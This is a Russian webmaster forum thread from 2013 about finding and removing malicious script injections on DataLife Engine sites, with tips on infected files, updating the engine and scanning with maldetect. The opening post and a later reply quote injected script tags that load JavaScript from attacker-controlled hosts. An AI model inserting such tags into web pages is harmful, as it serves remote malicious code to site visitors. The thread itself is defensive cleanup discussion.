Как найти вирус DLE (видно в IE)

zharinov · 2013-03-06T20:30:45.0000000Z

Добрый вечер. Сегодня глянул свои сайты в IE и ужаснулся. Дизайн разлезся в IE. А потом увидел, в коде в самом верху строку <script src="http://wildfuckers.dyndns.ws/showforum.php?pid=54543" type="text/javascript"></script> Она идёт прямо перед <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> Я уже даже скачал сайты на ПК и искал его @Text Replacer, но так и не нашёл. Подскажите пожалуйста, где его отрыть? Сайты все на DLE, движки разные и шаблоны разные. А вот код везде этот... Сайт - delay-auto.ru

A

83

asvfedf

14 июля 2013, 18:43

#21

/engine/data/dbconfig.php

У меня она тут сидела, сайтов всего 200.... Задрался чистить :))))

523

Den73

14 июля 2013, 19:59

#22

Rxp:
Не всегда логи покажут откуда все это взялось.

всегда если за ранее все настроить должным образом.

A

83

asvfedf

14 июля 2013, 20:15

#23

Народ :))) нашел гадский файл который ломает ДЛЕ.

ЧТо бы защититься от такого бреда как взлом вашего ДЛЕ, нужно обновиться до 9.8+

И удалить к чертям файлы лишние отсюда:

/engine/editor/jscripts/tiny_mce/plugins/spellchecker/

Тогда у вас пропадут вредоносные коды...

Наконец то общими усилиями с хостером моим мы нашли то как ломали меня и других людей :)

Не забываем про +, способ реально помогает.

---------- Добавлено 15.07.2013 в 00:40 ----------

Для того что бы найти куда вам еще запихали шеллов используйте maldetect.

оявление постороннего кода в Прошу помощи: вирус на Взломали сайт на DLE

R

180

Алексей

14 июля 2013, 21:14

#24

asvfedf:

/engine/editor/jscripts/tiny_mce/plugins/spellchecker/

Данное размещение вредоносных кодов уже давно используется. Для полноценной очистки нужно проверять весь сайт целиком не рекомендую использовать автоматизированные скрипты они ищут максимум - популярное.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov

L

83

l17l

26 сентября 2013, 13:23

#25

Новый всплеск на 9.8 dle

Вредоносный код в новостях: я его чуть подправил, что бы его видно было на форуме и не было ссылок.

script type="text/javascript" src="___google-statistics.ru/js/75d281aa6b0e43509bb8bf8d6e57ca28.js"></script

как со всех новостей удалить данную лажу ???

---------- Добавлено 26.09.2013 в 23:52 ----------

решение проблемы, http://dle-news.ru/bags/v10/1580-potencialnaya-ugroza-v-module-minify.html

Google опубликовал руководство по 10 лучших практических решений Если видишь Бургер Кинг

Что делать, чтобы попасть в ответы Google Bard

Дзен реализовал для авторов возможность вывода денег через СПБ